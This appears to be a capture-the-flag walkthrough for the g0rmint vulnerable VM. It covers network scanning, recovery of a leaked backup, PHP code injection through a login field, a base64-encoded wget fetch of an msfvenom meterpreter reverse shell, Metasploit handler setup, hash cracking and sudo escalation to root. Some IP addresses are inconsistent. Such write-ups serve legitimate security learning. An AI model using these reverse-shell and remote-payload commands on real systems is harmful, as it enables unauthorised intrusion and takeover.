g04mint
First off, find the box:
netdiscover -r 192.168.171.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.171.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.171.138 00:0c:29:1f:ad:4c 1 60 VMware, Inc.
192.168.171.254 00:50:56:fa:32:59 1 60 VMware, Inc.
Scan with nmap:
nmap -T4 -A -oA g0rmint 192.168.171.138
Looks like 22 and 80 are open, not a lot to go on...
Accessing the server on port 80 returns a 404 page, better try for a robots.txt and find this:
/* Too easy? Lets see / Disallow: /g0rmint/
Now I'm faced with a login page and nothing to go on, however the following showed up in the login page's markup:
Next run dirb to try and find hidden content, nothing really popped up.
I tried fuzzing a bunch of mobile user agents to see if this meta tag somehow triggers a different page response as well as brute forcing the login/reset forms, nothing seemed to be working.
Then I remembered I need to try force browsing that directory now that new file system elements exist:
dirb http://192.168.171,138/g0rmint/s3crebackupdirect0ry -i -l
This found an info.php file which shows backup.zip, lets download that and take a look
A few interesting things here, first the config file has a function for writing PHP files out to the server, and the login page calls this storing the email form field in the generated PHP.
function addlog($log, $reason) {
$myFile = "s3cr3t-dir3ct0ry-f0r-l0gs/" . date("Y-m-d") . ".php";
if (file_exists($myFile)) {
$fh = fopen($myFile, 'a');
fwrite($fh, $reason . $log . "
\n");
} else {
$fh = fopen($myFile, 'w');
fwrite($fh, file_get_contents("dummy.php") . "
\n");
fclose($fh);
$fh = fopen($myFile, 'a');
fwrite($fh, $reason . $log . "
\n");
}
fclose($fh);
}
Next looking at the register page if we know a legit user/email combination the user's password will be reset to the first 20 characters of a sha1 hash of the current date/time in GMT, which luckily gets printed to the page each time you reload or submit a postback.
After a lot of banging my head I finally learned a vital piece I'm usually missing during enumeration, in this case we need an email. What I'm finally learning is I should be searching better any time I have a known input, in this case the email can be searched for in all this source code:
grep -i -r -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" *
Binary file backup.zip matches
css/font-awesome.min.css:dave@davegandy.com
css/style.css:w3bdrill3r@gmail.com
css/style.css:timeline-left-arrow@2x.png
css/style.css:timeline-right-arrow@2x.png
css/style.css:chat-left@2x.png
css/style.css:chat-right@2x.png
css/style.css:chat-left-metro@2x.png
css/style.css:chat-right-metro@2x.png
css/font-awesome-ie7.min.css:dave@davegandy.com
db.sql:demo@example.com
Binary file img/gallery/photo5.jpg matches
js/jquery.elfinder.min.js:troex@fury.scancode.ru
js/jquery.elfinder.min.js:dio@std42.ru
js/jquery.elfinder.min.js:troex@fury.scancode.ru
js/jquery.elfinder.min.js:strogg@yandex.ru
js/jquery.elfinder.min.js:hypweb@gmail.com
Now to review all the files, style.css seems like a good starting point, thats usually the place an author or developer would put their CSS for a site/app.
/*
* Author: noman
* Author Email: w3bdrill3r@gmail.com
* Version: 1.0.0
* g0rmint: Bik gai hai
* Copyright: Aunty g0rmint
* www: http://g0rmint.com
* Site managed and developed by author himself
*/
Right in plain site, it even states the manager/developer/admin as this person.
Now to get our password, time to generate our hash:
substr(hash('sha1', 'date time string from the page load'), 0, 20);
and we have our password.
With the amount of time that elapsed getting this far I had completely forgotten about the addslashes call in config.php which lead to me wasting hours trying to get decent code execution going. Once I reviewed the code again getting execution was pretty straightforward:
as our email and we can start sending commands.
Now to generate a wget command to pull down a reverse_tcp shell:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.171.136 LPORT=4444 R > shell.php
echo 'wget http://192.168.171.36:8000/shell.php' | base64
d2dldCBodHRwOi8vMTkyLjE2OC4xNzEuMzY6ODAwMC9zaGVsbC5waHAK==
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.171.138 - - [17/Jan/2018 22:32:39] "GET /shell.php HTTP/1.1" 200 -
Now to setup metasploit to handle the callback:
screen -S msf msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 192.168.171.136
LHOST => 192.168.171.136
msf exploit(handler) > set LPORT 4444
LPORT => 4444
set PAYLOAD php/meterpreter/reverse_tcp
Then request our webshell, and we have a meterpreter session running.
Once connected I grabbed and ran LinEnum from rebootuser in hopes of finding something juicy. Once I had the output I started parsing through and searched for vulns in the kernel, mysql, apache. logs, binaries, etc. and having nothing work. Then took a look around and saw another backup.zip, extract and get this difference:
INSERT INTO `g0rmint` (`id`, `username`, `email`, `pass`) VALUES
(1, 'noman', 'w3bdrill3r@gmail.com', 'ea60b43e48f3c2de55e4fc89b3da53dc');
Then crack the hash and get: tayyab123
Now to try ssh with the g0rmint user in /etc/passwd and get a login, run sudo -l:
g0rmint@ubuntu:~$ sudo -l
[sudo] password for g0rmint:
Matching Defaults entries for g0rmint on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User g0rmint may run the following commands on ubuntu:
(ALL : ALL) ALL
Looks like we're done:
g0rmint@ubuntu:~$ sudo su
root@ubuntu:/home/g0rmint# ls /root
flag.txt
root@ubuntu:/home/g0rmint# cat /root/flag.txt
Congrats you did it :)
Give me feedback @nomanriffat
root@ubuntu:/home/g0rmint#